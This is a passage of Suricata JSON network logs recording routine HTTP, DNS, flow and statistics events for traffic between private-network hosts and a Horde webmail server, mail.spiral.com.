632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2244,"failed_udp":110},"tx":{"http":4541,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2321}},"flow_mgr":{"closed_pruned":2693,"new_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21165,"memcap_state":0,"memcap_global":0},"http":{"memuse":188825,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:00.231216+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:07:00.242351+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12284,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:00.421380+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:00.708831+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35100,"tx_id":1}} {"timestamp":"2020-02-29T00:07:00.719517+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6681,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:07:00.886477+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:00.886498+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905}} {"timestamp":"2020-02-29T00:07:02.000817+0000","flow_id":1373619292299151,"event_type":"flow","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:01.614287+0000","end":"2020-02-29T00:02:01.726419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:02.000980+0000","flow_id":1385872834029786,"event_type":"flow","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:01.583898+0000","end":"2020-02-29T00:02:01.695422+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:03.000661+0000","flow_id":1224077136164186,"event_type":"flow","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":13,"bytes_toserver":2729,"bytes_toclient":7411,"start":"2020-02-29T00:05:52.587098+0000","end":"2020-02-29T00:06:02.061403+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:03.001362+0000","flow_id":2245411754145674,"event_type":"flow","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:02.063370+0000","end":"2020-02-29T00:02:02.174799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:05.000870+0000","flow_id":1667395055547594,"event_type":"flow","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.750794+0000","end":"2020-02-29T00:02:04.861699+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:05.888042+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:07:06.000423+0000","flow_id":69813250355827,"event_type":"flow","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.979571+0000","end":"2020-02-29T00:02:05.090880+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:07.000175+0000","event_type":"stats","stats":{"uptime":14079,"capture":{"kernel_packets":133719,"kernel_drops":0},"decoder":{"pkts":133739,"bytes":92508417,"invalid":181,"ipv4":132282,"ipv6":8,"ethernet":133739,"raw":0,"null":0,"sll":0,"tcp":127162,"udp":4924,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2246,"failed_udp":110},"tx":{"http":4543,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2323}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2292,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":137002,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:08.048471+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61304,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:08.234197+0000","flow_id":322507671114127,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","length":20}} {"timestamp":"2020-02-29T00:07:08.241765+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35492,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.433029+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20847,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:07:13.001742+0000","flow_id":1646985371396187,"event_type":"flow","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:11.927835+0000","end":"2020-02-29T00:02:12.039358+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:14.000393+0000","event_type":"stats","stats":{"uptime":14086,"capture":{"kernel_packets":133750,"kernel_drops":0},"decoder":{"pkts":133793,"bytes":92539822,"invalid":183,"ipv4":132336,"ipv6":8,"ethernet":133793,"raw":0,"null":0,"sll":0,"tcp":127208,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2294,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":41230,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:16.000296+0000","flow_id":1288304062889383,"event_type":"flow","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:15.196007+0000","end":"2020-02-29T00:02:15.307685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:16.615624+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} {"timestamp":"2020-02-29T00:07:20.223330+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:20.401062+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750}} {"timestamp":"2020-02-29T00:07:21.000157+0000","event_type":"stats","stats":{"uptime":14093,"capture":{"kernel_packets":133797,"kernel_drops":0},"decoder":{"pkts":133800,"bytes":92540236,"invalid":183,"ipv4":132341,"ipv6":8,"ethernet":133800,"raw":0,"null":0,"sll":0,"tcp":127213,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"
flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2296,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":53911,"memcap":0}}} {"timestamp":"2020-02-29T00:07:24.001722+0000","flow_id":936726630439456,"event_type":"flow","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:23.858656+0000","end":"2020-02-29T00:02:23.964468+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:25.401776+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52696,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} 
{"timestamp":"2020-02-29T00:07:28.000450+0000","event_type":"stats","stats":{"uptime":14100,"capture":{"kernel_packets":133819,"kernel_drops":0},"decoder":{"pkts":133822,"bytes":92548413,"invalid":183,"ipv4":132363,"ipv6":8,"ethernet":133822,"raw":0,"null":0,"sll":0,"tcp":127233,"udp":4932,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2714,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2730,"synack":2721,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1757,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2250,"failed_udp":110},"tx":{"http":4546,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2327}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2297,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20506,"memcap_state":0,"memcap_global":0},"http":{"memuse":2192,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:29.000493+0000","flow_id":1061177603184026,"event_type":"flow","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:02:28.578970+0000","end":"2020-02-29T00:02:28.812490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:30.133597+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27477,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 